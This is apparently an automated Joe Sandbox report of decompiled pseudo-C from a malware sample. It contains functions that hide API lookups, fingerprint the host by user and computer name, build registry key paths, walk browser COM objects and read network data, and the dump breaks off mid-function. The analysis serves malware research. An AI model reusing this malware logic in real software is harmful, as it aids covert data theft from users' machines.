                                                    • Instruction ID: 0365628b4519f0d8e520f08255f52b335f8d2a366fd0081980bfb37ea00c8ec4
                                                    • Opcode Fuzzy Hash: 7a62f9c0a8ca0e8d1f9d9bf147bcb06dc5d2cd57a170ff77f7394dec323801e7
                                                    • Instruction Fuzzy Hash: 9D518D7290021AEBCF12AFA5CC68ADE7BB5FF44354F058064F954A7260DB36CA11EF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0109151D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t26;
                                                    				_Unknown_base(*)()* _t28;
                                                    				intOrPtr _t30;
                                                    				_Unknown_base(*)()* _t32;
                                                    				intOrPtr _t33;
                                                    				_Unknown_base(*)()* _t35;
                                                    				intOrPtr _t36;
                                                    				_Unknown_base(*)()* _t38;
                                                    				intOrPtr _t39;
                                                    				_Unknown_base(*)()* _t41;
                                                    				intOrPtr _t44;
                                                    				struct HINSTANCE__* _t48;
                                                    				intOrPtr _t54;
                                                    
                                                    				_t54 = E01096A51(0x20);
                                                    				if(_t54 == 0) {
                                                    					_v8 = 8;
                                                    				} else {
                                                    					_t23 =  *0x109a348; // 0xa6d5a8
                                                    					_t1 = _t23 + 0x109b11a; // 0x4c44544e
                                                    					_t48 = GetModuleHandleA(_t1);
                                                    					_t26 =  *0x109a348; // 0xa6d5a8
                                                    					_t2 = _t26 + 0x109b761; // 0x7243775a
                                                    					_v8 = 0x7f;
                                                    					_t28 = GetProcAddress(_t48, _t2);
                                                    					 *(_t54 + 0xc) = _t28;
                                                    					if(_t28 == 0) {
                                                    						L8:
                                                    						E0109692B(_t54);
                                                    					} else {
                                                    						_t30 =  *0x109a348; // 0xa6d5a8
                                                    						_t5 = _t30 + 0x109b74e; // 0x614d775a
                                                    						_t32 = GetProcAddress(_t48, _t5);
                                                    						 *(_t54 + 0x10) = _t32;
                                                    						if(_t32 == 0) {
                                                    							goto L8;
                                                    						} else {
                                                    							_t33 =  *0x109a348; // 0xa6d5a8
                                                    							_t7 = _t33 + 0x109b771; // 0x6e55775a
                                                    							_t35 = GetProcAddress(_t48, _t7);
                                                    							 *(_t54 + 0x14) = _t35;
                                                    							if(_t35 == 0) {
                                                    								goto L8;
                                                    							} else {
                                                    								_t36 =  *0x109a348; // 0xa6d5a8
                                                    								_t9 = _t36 + 0x109b4ca; // 0x4e6c7452
                                                    								_t38 = GetProcAddress(_t48, _t9);
                                                    								 *(_t54 + 0x18) = _t38;
                                                    								if(_t38 == 0) {
                                                    									goto L8;
                                                    								} else {
                                                    									_t39 =  *0x109a348; // 0xa6d5a8
                                                    									_t11 = _t39 + 0x109b786; // 0x6c43775a
                                                    									_t41 = GetProcAddress(_t48, _t11);
                                                    									 *(_t54 + 0x1c) = _t41;
                                                    									if(_t41 == 0) {
                                                    										goto L8;
                                                    									} else {
                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                    										_t44 = E0109625A(_t54, _a8);
                                                    										_v8 = _t44;
                                                    										if(_t44 != 0) {
                                                    											goto L8;
                                                    										} else {
                                                    											 *_a12 = _t54;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _v8;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01097082,?,?,?,?,00000000,00000000), ref: 01091542
                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01091564
                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0109157A
                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01091590
                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010915A6
                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010915BC
                                                      • Part of subcall function 0109625A: memset.NTDLL ref: 010962D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                    • String ID: Nqt
                                                    • API String ID: 1886625739-806837294
                                                    • Opcode ID: 179a42dd990767e1f47b7b6f044424871cd8aa14aa2e5b77c2df714915915d7b
                                                    • Instruction ID: fb78f2130cffe87e3c3f9377ca8b405e8424fc6eb634c010fb53464a3f288458
                                                    • Opcode Fuzzy Hash: 179a42dd990767e1f47b7b6f044424871cd8aa14aa2e5b77c2df714915915d7b
                                                    • Instruction Fuzzy Hash: EB213CB060070BEFDB20DF69D8B4E9ABBECFB042547058165F586C7221DB74EA09DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E010916DD() {
                                                    				long _v8;
                                                    				long _v12;
                                                    				int _v16;
                                                    				long _t39;
                                                    				long _t43;
                                                    				signed int _t47;
                                                    				short _t51;
                                                    				signed int _t52;
                                                    				int _t56;
                                                    				int _t57;
                                                    				char* _t64;
                                                    				short* _t67;
                                                    
                                                    				_v16 = 0;
                                                    				_v8 = 0;
                                                    				GetUserNameW(0,  &_v8);
                                                    				_t39 = _v8;
                                                    				if(_t39 != 0) {
                                                    					_v12 = _t39;
                                                    					_v8 = 0;
                                                    					GetComputerNameW(0,  &_v8);
                                                    					_t43 = _v8;
                                                    					if(_t43 != 0) {
                                                    						_t11 = _t43 + 2; // 0x775ec742
                                                    						_v12 = _v12 + _t11;
                                                    						_t64 = E01096A51(_v12 + _t11 << 2);
                                                    						if(_t64 != 0) {
                                                    							_t47 = _v12;
                                                    							_t67 = _t64 + _t47 * 2;
                                                    							_v8 = _t47;
                                                    							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                    								L7:
                                                    								E0109692B(_t64);
                                                    							} else {
                                                    								_t51 = 0x40;
                                                    								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                    								_t52 = _v8;
                                                    								_v12 = _v12 - _t52;
                                                    								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                    									goto L7;
                                                    								} else {
                                                    									_t56 = _v12 + _v8;
                                                    									_t31 = _t56 + 2; // 0x1093781
                                                    									_v12 = _t56;
                                                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                    									_v8 = _t57;
                                                    									if(_t57 == 0) {
                                                    										goto L7;
                                                    									} else {
                                                    										_t64[_t57] = 0;
                                                    										_v16 = _t64;
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _v16;
                                                    			}

                                                    APIs
                                                    • GetUserNameW.ADVAPI32(00000000,0109377F), ref: 010916F1
                                                    • GetComputerNameW.KERNEL32(00000000,0109377F), ref: 0109170D
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • GetUserNameW.ADVAPI32(00000000,0109377F), ref: 01091747
                                                    • GetComputerNameW.KERNEL32(0109377F,775EC740), ref: 0109176A
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0109377F,00000000,01093781,00000000,00000000,?,775EC740,0109377F), ref: 0109178D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                    • String ID: @hqt
                                                    • API String ID: 3850880919-2648236075
                                                    • Opcode ID: bbb2095add0c24ce699f5d3f9ddb3124cb347d2d833e6f6afbf11d2b0e22efe3
                                                    • Instruction ID: e80d3ae05d110111b38fa9aef31d9b97ae8c79b02b7f658de8be5f1bae913d45
                                                    • Opcode Fuzzy Hash: bbb2095add0c24ce699f5d3f9ddb3124cb347d2d833e6f6afbf11d2b0e22efe3
                                                    • Instruction Fuzzy Hash: E621D976E0020AFFDB11DFE9C9988EEBBBCFF84204B5044AAE641E7244D6349B44DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E010913E8(intOrPtr _a4) {
                                                    				void* _t2;
                                                    				unsigned int _t4;
                                                    				void* _t5;
                                                    				long _t6;
                                                    				void* _t7;
                                                    				void* _t15;
                                                    
                                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                                    				 *0x109a30c = _t2;
                                                    				if(_t2 == 0) {
                                                    					return GetLastError();
                                                    				}
                                                    				_t4 = GetVersion();
                                                    				if(_t4 != 5) {
                                                    					L4:
                                                    					if(_t15 <= 0) {
                                                    						_t5 = 0x32;
                                                    						return _t5;
                                                    					}
                                                    					L5:
                                                    					 *0x109a2fc = _t4;
                                                    					_t6 = GetCurrentProcessId();
                                                    					 *0x109a2f8 = _t6;
                                                    					 *0x109a304 = _a4;
                                                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                    					 *0x109a2f4 = _t7;
                                                    					if(_t7 == 0) {
                                                    						 *0x109a2f4 =  *0x109a2f4 | 0xffffffff;
                                                    					}
                                                    					return 0;
                                                    				}
                                                    				if(_t4 >> 8 > 0) {
                                                    					goto L5;
                                                    				}
                                                    				_t15 = _t4 - _t4;
                                                    				goto L4;
                                                    			}

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01091099,?), ref: 010913F0
                                                    • GetVersion.KERNEL32 ref: 010913FF
                                                    • GetCurrentProcessId.KERNEL32 ref: 0109141B
                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01091438
                                                    • GetLastError.KERNEL32 ref: 01091457
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                    • String ID: @MqtNqt
                                                    • API String ID: 2270775618-2883916605
                                                    • Opcode ID: 21620047f6fc372a31f9e9f3d88bc1f8247d8df6965a71e6270900d01bc11a80
                                                    • Instruction ID: 34476fe2e0770ef8c47e4876d51310659cb1cb0a8fe2aefbdc817c41c2061863
                                                    • Opcode Fuzzy Hash: 21620047f6fc372a31f9e9f3d88bc1f8247d8df6965a71e6270900d01bc11a80
                                                    • Instruction Fuzzy Hash: 3CF03170740303DFDF744B29A939B143BA2B749765F104469F6E6C71D9DABA8080DB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SysAllocString.OLEAUT32(00000000), ref: 01094C1E
                                                    • SysAllocString.OLEAUT32(0070006F), ref: 01094C32
                                                    • SysAllocString.OLEAUT32(00000000), ref: 01094C44
                                                    • SysFreeString.OLEAUT32(00000000), ref: 01094CAC
                                                    • SysFreeString.OLEAUT32(00000000), ref: 01094CBB
                                                    • SysFreeString.OLEAUT32(00000000), ref: 01094CC6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: String$AllocFree
                                                    • String ID:
                                                    • API String ID: 344208780-0
                                                    • Opcode ID: 12fbce3cae52d311f04a5e53de50f06a500a22c148530ab142b2af4558ad56f0
                                                    • Instruction ID: 7b2186d1179fbe1c73c2dae8f6c9d2f431813bd2fce6f86bae3f2c8e105c7429
                                                    • Opcode Fuzzy Hash: 12fbce3cae52d311f04a5e53de50f06a500a22c148530ab142b2af4558ad56f0
                                                    • Instruction Fuzzy Hash: 9A418E32D00A09AFDF41DFFCD954ADEBBF9AF88200F104466EA51EB260DA719906CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E0109202C(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                    				signed int _v8;
                                                    				char _v12;
                                                    				signed int* _v16;
                                                    				char _v284;
                                                    				void* __esi;
                                                    				char* _t59;
                                                    				intOrPtr* _t60;
                                                    				intOrPtr _t64;
                                                    				char _t65;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t71;
                                                    				void* _t73;
                                                    				signed int _t81;
                                                    				void* _t91;
                                                    				void* _t92;
                                                    				char _t98;
                                                    				signed int* _t100;
                                                    				intOrPtr* _t101;
                                                    				void* _t102;
                                                    
                                                    				_t92 = __ecx;
                                                    				_v8 = _v8 & 0x00000000;
                                                    				_t98 = _a16;
                                                    				if(_t98 == 0) {
                                                    					__imp__( &_v284,  *0x109a3dc);
                                                    					_t91 = 0x80000002;
                                                    					L6:
                                                    					_t59 = E01094881( &_v284,  &_v284);
                                                    					_a8 = _t59;
                                                    					if(_t59 == 0) {
                                                    						_v8 = 8;
                                                    						L29:
                                                    						_t60 = _a20;
                                                    						if(_t60 != 0) {
                                                    							 *_t60 =  *_t60 + 1;
                                                    						}
                                                    						return _v8;
                                                    					}
                                                    					_t101 = _a24;
                                                    					if(E01093E49(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                    						L27:
                                                    						E0109692B(_a8);
                                                    						goto L29;
                                                    					}
                                                    					_t64 =  *0x109a318; // 0x1b09dd8
                                                    					_t16 = _t64 + 0xc; // 0x1b09efa
                                                    					_t65 = E01094881(_t64,  *_t16);
                                                    					_a24 = _t65;
                                                    					if(_t65 == 0) {
                                                    						L14:
                                                    						_t29 = _t101 + 0x14; // 0x102
                                                    						_t33 = _t101 + 0x10; // 0x3d010990
                                                    						if(E010910C5(_t97,  *_t33, _t91, _a8,  *0x109a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                    							_t68 =  *0x109a348; // 0xa6d5a8
                                                    							if(_t98 == 0) {
                                                    								_t35 = _t68 + 0x109ba3e; // 0x4d4c4b48
                                                    								_t69 = _t35;
                                                    							} else {
                                                    								_t34 = _t68 + 0x109ba39; // 0x55434b48
                                                    								_t69 = _t34;
                                                    							}
                                                    							if(E01096DB6(_t69,  *0x109a3d4,  *0x109a3d8,  &_a24,  &_a16) == 0) {
                                                    								if(_t98 == 0) {
                                                    									_t71 =  *0x109a348; // 0xa6d5a8
                                                    									_t44 = _t71 + 0x109b842; // 0x74666f53
                                                    									_t73 = E01094881(_t44, _t44);
                                                    									_t99 = _t73;
                                                    									if(_t73 == 0) {
                                                    										_v8 = 8;
                                                    									} else {
                                                    										_t47 = _t101 + 0x10; // 0x3d010990
                                                    										E010951C0( *_t47, _t91, _a8,  *0x109a3d8, _a24);
                                                    										_t49 = _t101 + 0x10; // 0x3d010990
                                                    										E010951C0( *_t49, _t91, _t99,  *0x109a3d0, _a16);
                                                    										E0109692B(_t99);
                                                    									}
                                                    								} else {
                                                    									_t40 = _t101 + 0x10; // 0x3d010990
                                                    									E010951C0( *_t40, _t91, _a8,  *0x109a3d8, _a24);
                                                    									_t43 = _t101 + 0x10; // 0x3d010990
                                                    									E010951C0( *_t43, _t91, _a8,  *0x109a3d0, _a16);
                                                    								}
                                                    								if( *_t101 != 0) {
                                                    									E0109692B(_a24);
                                                    								} else {
                                                    									 *_t101 = _a16;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L27;
                                                    					}
                                                    					_t21 = _t101 + 0x10; // 0x3d010990
                                                    					_t81 = E010954A0( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                    					if(_t81 == 0) {
                                                    						_t100 = _v16;
                                                    						if(_v12 == 0x28) {
                                                    							 *_t100 =  *_t100 & _t81;
                                                    							_t26 = _t101 + 0x10; // 0x3d010990
                                                    							E010910C5(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                    						}
                                                    						E0109692B(_t100);
                                                    						_t98 = _a16;
                                                    					}
                                                    					E0109692B(_a24);
                                                    					goto L14;
                                                    				}
                                                    				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                    					goto L29;
                                                    				} else {
                                                    					_t97 = _a8;
                                                    					E010979F1(_t98, _a8,  &_v284);
                                                    					__imp__(_t102 + _t98 - 0x117,  *0x109a3dc);
                                                    					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                    					_t91 = 0x80000003;
                                                    					goto L6;
                                                    				}
                                                    			}

                                                    APIs
                                                    • StrChrA.SHLWAPI(0109299F,0000005F,00000000,00000000,00000104), ref: 0109205F
                                                    • lstrcpy.KERNEL32(?,?), ref: 0109208C
                                                      • Part of subcall function 01094881: lstrlen.KERNEL32(?,00000000,01B09DD8,00000000,0109166A,01B09FFB,69B25F44,?,?,?,?,69B25F44,00000005,0109A00C,4D283A53,?), ref: 01094888
                                                      • Part of subcall function 01094881: mbstowcs.NTDLL ref: 010948B1
                                                      • Part of subcall function 01094881: memset.NTDLL ref: 010948C3
                                                      • Part of subcall function 010951C0: lstrlenW.KERNEL32(?,?,?,010921F5,3D010990,80000002,0109299F,01096A0D,74666F53,4D4C4B48,01096A0D,?,3D010990,80000002,0109299F,?), ref: 010951E5
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    • lstrcpy.KERNEL32(?,00000000), ref: 010920AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                    • String ID: ($\
                                                    • API String ID: 3924217599-1512714803
                                                    • Opcode ID: a1915a53669c75a92c8dc489e61d38f7ec13b606b87805733013f042705a4803
                                                    • Instruction ID: a957b7e7d0d3dbbb36a300097f67e9c95a3f326965efcfb44c5cf989a984d498
                                                    • Opcode Fuzzy Hash: a1915a53669c75a92c8dc489e61d38f7ec13b606b87805733013f042705a4803
                                                    • Instruction Fuzzy Hash: E8515A7560020AFFDF22AFA4DC60EEA3BB9FB18354F008154FA9196160D776D925EB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E01092715(intOrPtr* __eax) {
                                                    				void* _v8;
                                                    				WCHAR* _v12;
                                                    				void* _v16;
                                                    				char _v20;
                                                    				void* _v24;
                                                    				intOrPtr _v28;
                                                    				void* _v32;
                                                    				intOrPtr _v40;
                                                    				short _v48;
                                                    				intOrPtr _v56;
                                                    				short _v64;
                                                    				intOrPtr* _t54;
                                                    				intOrPtr* _t56;
                                                    				intOrPtr _t57;
                                                    				intOrPtr* _t58;
                                                    				intOrPtr* _t60;
                                                    				void* _t61;
                                                    				intOrPtr* _t63;
                                                    				intOrPtr* _t65;
                                                    				short _t67;
                                                    				intOrPtr* _t68;
                                                    				intOrPtr* _t70;
                                                    				intOrPtr* _t72;
                                                    				intOrPtr* _t75;
                                                    				intOrPtr* _t77;
                                                    				intOrPtr _t79;
                                                    				intOrPtr* _t83;
                                                    				intOrPtr* _t87;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t109;
                                                    				void* _t118;
                                                    				void* _t122;
                                                    				void* _t123;
                                                    				intOrPtr _t130;
                                                    
                                                    				_t123 = _t122 - 0x3c;
                                                    				_push( &_v8);
                                                    				_push(__eax);
                                                    				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                    				if(_t118 >= 0) {
                                                    					_t54 = _v8;
                                                    					_t103 =  *0x109a348; // 0xa6d5a8
                                                    					_t5 = _t103 + 0x109b038; // 0x3050f485
                                                    					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                    					_t56 = _v8;
                                                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                    					if(_t118 >= 0) {
                                                    						__imp__#2(0x1099284);
                                                    						_v28 = _t57;
                                                    						if(_t57 == 0) {
                                                    							_t118 = 0x8007000e;
                                                    						} else {
                                                    							_t60 = _v32;
                                                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                    							_t87 = __imp__#6;
                                                    							_t118 = _t61;
                                                    							if(_t118 >= 0) {
                                                    								_t63 = _v24;
                                                    								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                    								if(_t118 >= 0) {
                                                    									_t130 = _v20;
                                                    									if(_t130 != 0) {
                                                    										_t67 = 3;
                                                    										_v64 = _t67;
                                                    										_v48 = _t67;
                                                    										_v56 = 0;
                                                    										_v40 = 0;
                                                    										if(_t130 > 0) {
                                                    											while(1) {
                                                    												_t68 = _v24;
                                                    												asm("movsd");
                                                    												asm("movsd");
                                                    												asm("movsd");
                                                    												asm("movsd");
                                                    												_t123 = _t123;
                                                    												asm("movsd");
                                                    												asm("movsd");
                                                    												asm("movsd");
                                                    												asm("movsd");
                                                    												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                    												if(_t118 < 0) {
                                                    													goto L16;
                                                    												}
                                                    												_t70 = _v8;
                                                    												_t109 =  *0x109a348; // 0xa6d5a8
                                                    												_t28 = _t109 + 0x109b0bc; // 0x3050f1ff
                                                    												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                    												if(_t118 >= 0) {
                                                    													_t75 = _v16;
                                                    													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                    													if(_t118 >= 0 && _v12 != 0) {
                                                    														_t79 =  *0x109a348; // 0xa6d5a8
                                                    														_t33 = _t79 + 0x109b078; // 0x76006f
                                                    														if(lstrcmpW(_v12, _t33) == 0) {
                                                    															_t83 = _v16;
                                                    															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                    														}
                                                    														 *_t87(_v12);
                                                    													}
                                                    													_t77 = _v16;
                                                    													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                    												}
                                                    												_t72 = _v8;
                                                    												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                    												_v40 = _v40 + 1;
                                                    												if(_v40 < _v20) {
                                                    													continue;
                                                    												}
                                                    												goto L16;
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    								L16:
                                                    								_t65 = _v24;
                                                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                    							}
                                                    							 *_t87(_v28);
                                                    						}
                                                    						_t58 = _v32;
                                                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                    					}
                                                    				}
                                                    				return _t118;
                                                    			}

                                                    APIs
                                                    • SysAllocString.OLEAUT32(01099284), ref: 01092765
                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 01092846
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0109285F
                                                    • SysFreeString.OLEAUT32(?), ref: 0109288E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: String$Free$Alloclstrcmp
                                                    • String ID: hqt
                                                    • API String ID: 1885612795-215443068
                                                    • Opcode ID: 9ea7f31cbe401b1b554f3986a6ffdeed049645982f28330ba75632b482d63dbb
                                                    • Instruction ID: aec65c80082d56c0017992f9d97f6bf56de7083d823a79393792bf9ba2b166fc
                                                    • Opcode Fuzzy Hash: 9ea7f31cbe401b1b554f3986a6ffdeed049645982f28330ba75632b482d63dbb
                                                    • Instruction Fuzzy Hash: 20513A75D0060AEFCF10DFA8C8989AEB7B9FF88704B148598F955EB214D731AD41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 42%
                                                    			E0109466D(void* __eax, void* __ecx) {
                                                    				char _v8;
                                                    				void* _v12;
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				void* __esi;
                                                    				void* _t30;
                                                    				intOrPtr _t38;
                                                    				intOrPtr* _t39;
                                                    				intOrPtr* _t41;
                                                    				void* _t54;
                                                    				long _t64;
                                                    				void* _t67;
                                                    				void* _t69;
                                                    
                                                    				_t58 = __ecx;
                                                    				_t67 = __eax;
                                                    				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                    					L2:
                                                    					_t30 = _t67;
                                                    					_pop(_t68);
                                                    					_t69 = _t30;
                                                    					_t64 = 0;
                                                    					ResetEvent( *(_t69 + 0x1c));
                                                    					_push( &_v8);
                                                    					_push(4);
                                                    					_push( &_v20);
                                                    					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                    					if( *0x109a160() != 0) {
                                                    						L9:
                                                    						if(_v8 == 0) {
                                                    							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                    						} else {
                                                    							 *0x109a174(0, 1,  &_v12);
                                                    							if(0 != 0) {
                                                    								_t64 = 8;
                                                    							} else {
                                                    								_t38 = E01096A51(0x1000);
                                                    								_v16 = _t38;
                                                    								if(_t38 == 0) {
                                                    									_t64 = 8;
                                                    								} else {
                                                    									_push(0);
                                                    									_push(_v8);
                                                    									_push( &_v20);
                                                    									while(1) {
                                                    										_t41 = _v12;
                                                    										_t61 =  *_t41;
                                                    										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                    										ResetEvent( *(_t69 + 0x1c));
                                                    										_push( &_v8);
                                                    										_push(0x1000);
                                                    										_push(_v16);
                                                    										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                    										if( *0x109a160() != 0) {
                                                    											goto L17;
                                                    										}
                                                    										_t64 = GetLastError();
                                                    										if(_t64 == 0x3e5) {
                                                    											_t64 = E010917ED( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                    											if(_t64 == 0) {
                                                    												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                    												if(_t64 == 0) {
                                                    													goto L17;
                                                    												}
                                                    											}
                                                    										}
                                                    										L19:
                                                    										E0109692B(_v16);
                                                    										if(_t64 == 0) {
                                                    											_t64 = E01092A84(_v12, _t69);
                                                    										}
                                                    										goto L22;
                                                    										L17:
                                                    										_t64 = 0;
                                                    										if(_v8 != 0) {
                                                    											_push(0);
                                                    											_push(_v8);
                                                    											_push(_v16);
                                                    											continue;
                                                    										}
                                                    										goto L19;
                                                    									}
                                                    								}
                                                    								L22:
                                                    								_t39 = _v12;
                                                    								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t64 = GetLastError();
